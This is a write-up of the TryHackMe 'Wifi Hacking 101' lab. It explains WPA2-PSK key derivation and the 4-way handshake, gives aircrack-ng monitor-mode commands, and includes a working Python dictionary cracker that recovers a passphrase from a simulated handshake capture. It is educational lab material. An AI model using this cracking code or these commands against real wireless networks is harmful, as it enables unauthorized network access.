TryHackMe - Wifi Hacking 101 room for WPA2

Wifi Hacking 101 is a TryHackMe room about attacking WPA(2) networks.


Before starting, what is a WPA(2) network?

WPA (Wi-Fi Protected Access) and WPA2 are the security mechanisms used to provide authenticated, encrypted access to a wireless network. WPA was developed to replace WEP (Wired Equivalent Privacy), which had been found easy to crack. WPA itself was later found to have weaknesses, and WPA2 replaced it.

WPA is based on TKIP (Temporal Key Integrity Protocol), a stopgap designed to run on WEP-era hardware, whereas WPA2 uses AES in CCMP mode. There is no practical attack on AES-CCMP itself, so attacks on WPA2-Personal go after the passphrase rather than the cipher, and new access points use WPA2 by default. AES-CCMP is more computationally demanding than TKIP, which is why old access points that were upgraded to WPA2 by a firmware update sometimes lag or show degraded performance.


Back to the Wifi Hacking room.

The key terms used in the room are as below:

SSID: The name of the network that is displayed when you choose a network to connect to.

ESSID: Extended SSID; a network name that (may) apply to multiple access points, for example all the access points of a company.

BSSID: The MAC (hardware) address of an access point.

WPA2-PSK: A Wi-Fi network you connect to by providing a Pre-Shared Key, that is, one common password shared by everyone.

WPA2-EAP: A Wi-Fi network you connect to by providing a username and password, which are authenticated by a RADIUS server using the 802.1X protocol.

RADIUS: A server for authenticating clients; it is used for more than just Wi-Fi.


HOW DOES WPA2 AUTHENTICATION WORK?

Most home Wi-Fi networks use WPA(2)-Personal (PSK). If you have to provide a username and password, it is WPA(2)-EAP (Enterprise).

WPA2 authentication uses the 4-way handshake. Through the handshake, the client and the AP each prove that they know the key without sending it over the air; the handshake messages also carry the nonces from which the per-session keys are derived.

The keys for WPA(2)-Personal are derived from the ESSID and the network password: the Pairwise Master Key (PMK) is PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as the salt (4096 iterations, 256-bit output). Because the ESSID acts as a salt, the same password yields different keys on networks with different names, so an attacker cannot precompute a single table of keys that works against every network.


Now to the Wifi Hacking 101 room, Task 1: The basics - an intro to WPA

1. What type of attack on the encryption can you perform on WPA(2) personal?

Ans: Brute force. On WPA(2)-Personal there is no practical attack on AES-CCMP itself, so the attack targets the passphrase: capture the 4-way handshake, then try every candidate password (usually from a wordlist) until one reproduces the MIC in the captured handshake.
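The following is an added worked example, not code from the room or from the aircrack-ng project. It ties together the key derivation described above (PMK from passphrase and ESSID, PTK from the PMK plus the two MAC addresses and nonces) and the brute-force attack from this answer: a candidate passphrase is correct when the KCK derived from it reproduces the MIC of a captured EAPOL-Key message. Because no real capture is available here, the "captured" message 2 frame is constructed in the block itself by signing it with the true PSK; the SSID, MAC addresses, nonces and wordlist are constructed sample values.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA(2)-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces). First 16 bytes = KCK."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): MIC = HMAC-SHA1 over the EAPOL-Key frame, truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + key IV (16) + key RSC (8) + key ID (8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


def zero_mic(frame: bytes) -> bytes:
    """The MIC is computed over the frame with its own 16-byte MIC field set to zero."""
    return frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, frame, wordlist):
    """Offline dictionary attack: the candidate whose KCK reproduces the captured MIC is the PSK."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    to_mic = zero_mic(frame)
    for candidate in wordlist:
        pmk = derive_pmk(candidate, ssid)          # the expensive step: 4096 PBKDF2 rounds per guess
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, to_mic), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) of the 4-way handshake, field layout per 802.11i."""
    body = (
        b"\x02"                      # descriptor type: RSN
        + b"\x01\x0a"                # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit set
        + b"\x00\x10"                # key length 16 (CCMP)
        + (1).to_bytes(8, "big")     # replay counter
        + snonce                     # 32-byte SNonce chosen by the client
        + b"\x00" * 16               # key IV
        + b"\x00" * 8                # key RSC
        + b"\x00" * 8                # key ID
        + mic                        # 16-byte MIC
        + b"\x00\x00"                # key data length 0 (RSN IE omitted in this constructed frame)
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type 3 (Key)


# Constructed sample values standing in for what airodump-ng would have captured.
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("020000000001")      # BSSID
CLIENT_MAC = bytes.fromhex("020000000002")  # station address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def simulate_capture(true_psk: str) -> bytes:
    """Produce the message 2 frame a client holding the real PSK would send (stands in for a pcap)."""
    kck = derive_ptk(derive_pmk(true_psk, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_msg2(SNONCE, b"\x00" * 16)
    return build_msg2(SNONCE, eapol_mic(kck, unsigned))


if __name__ == "__main__":
    captured = simulate_capture("correct horse")
    wordlist = ["password", "12345678", "correct horse", "letmein1"]
    print("cracked PSK:", crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, captured, wordlist))
```

Everything the attacker needs (ESSID, BSSID, client MAC, both nonces and one MIC-bearing EAPOL frame) is in a captured handshake, which is why the attack is entirely offline and why salting with the ESSID only slows precomputation rather than preventing guessing. The per-guess cost is dominated by the 4096 PBKDF2 rounds; aircrack-ng and hashcat do the same computation far faster, but the logic is this.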

2. Can this method be used to attack WPA2-EAP handshakes?

Ans: No. WPA2-EAP authenticates each user with their own username and password against a RADIUS server, so there is no shared passphrase to derive from the handshake and guess.

3. What three-letter abbreviation is the technical term for the "wifi code/password/passphrase"?

Ans: PSK (Pre-Shared Key).

4. What's the minimum length of a WPA2 Personal password?

Ans: 8. The passphrase must be 8 to 63 ASCII characters long.


Task 2: You're being watched - Capturing packets to attack

We use the aircrack-ng suite (aircrack-ng, airodump-ng, airmon-ng) to attack the Wi-Fi network. It comes installed by default with Kali.

1. How do you put the interface "wlan0" into monitor mode with Aircrack tools? (Full command)

Ans: airmon-ng start wlan0

Before attacking the network, we need to put the wireless card into monitor mode. Monitor mode is a special mode that lets us capture every frame on the channel, not only the frames addressed to our own card. It also allows us to inject frames into the network.

2. What is the new interface name likely to be after you enable monitor mode?

Ans: wlan0mon

A new interface is created with "mon" appended to its name. To confirm that it really is in monitor mode, run the iwconfig command and check that the line for that interface says Mode:Monitor.

3. What do you do if other processes are currently trying to use that network adapter?

Ans: airmon-ng check kill

This stops processes such as NetworkManager and wpa_supplicant that would otherwise keep reconfiguring the adapter while we are capturing. Running airmon-ng check on its own first lists what would be killed, and you will have to restart the network service afterwards to get normal connectivity back.
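As an added example (not code from the room or from the aircrack-ng project), here is a small parser that checks the iwconfig output after airmon-ng start wlan0, so a script can confirm that the expected wlan0mon interface is really in Mode:Monitor before continuing, rather than assuming the rename succeeded. The iwconfig output embedded below is a constructed sample, not captured from a real host; in practice you would pass in the result of subprocess.check_output(["iwconfig"], text=True).

```python
import re

# Constructed sample of `iwconfig` output after `airmon-ng start wlan0` (wlan0 became wlan0mon;
# a second card wlan1 is still in managed mode). Not captured from a real machine.
SAMPLE_IWCONFIG = """\
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

wlan1     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

eth0      no wireless extensions.

lo        no wireless extensions.
"""


def parse_iwconfig(output: str) -> dict:
    """Map each interface name to its reported Mode (None for interfaces without wireless extensions)."""
    modes = {}
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():          # a line starting in column 0 begins a new interface block
            current = line.split()[0]
            modes[current] = None
        match = re.search(r"Mode:(\S+)", line)
        if match and current is not None:
            modes[current] = match.group(1)
    return modes


def monitor_interfaces(output: str) -> list:
    """Interfaces that iwconfig reports as Mode:Monitor, i.e. usable by airodump-ng."""
    return [name for name, mode in parse_iwconfig(output).items() if mode == "Monitor"]


def check_monitor(output: str, expected: str) -> bool:
    """True only if the interface we expect airmon-ng to have created is actually in monitor mode."""
    return expected in monitor_interfaces(output)


if __name__ == "__main__":
    print(parse_iwconfig(SAMPLE_IWCONFIG))
    print("wlan0mon ready:", check_monitor(SAMPLE_IWCONFIG, "wlan0mon"))
```

The check is deliberately strict about the interface name: if airmon-ng left the card as wlan0 (some drivers do not append "mon"), check_monitor returns False and the caller should read the actual name from monitor_interfaces instead of hard-coding wlan0mon.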
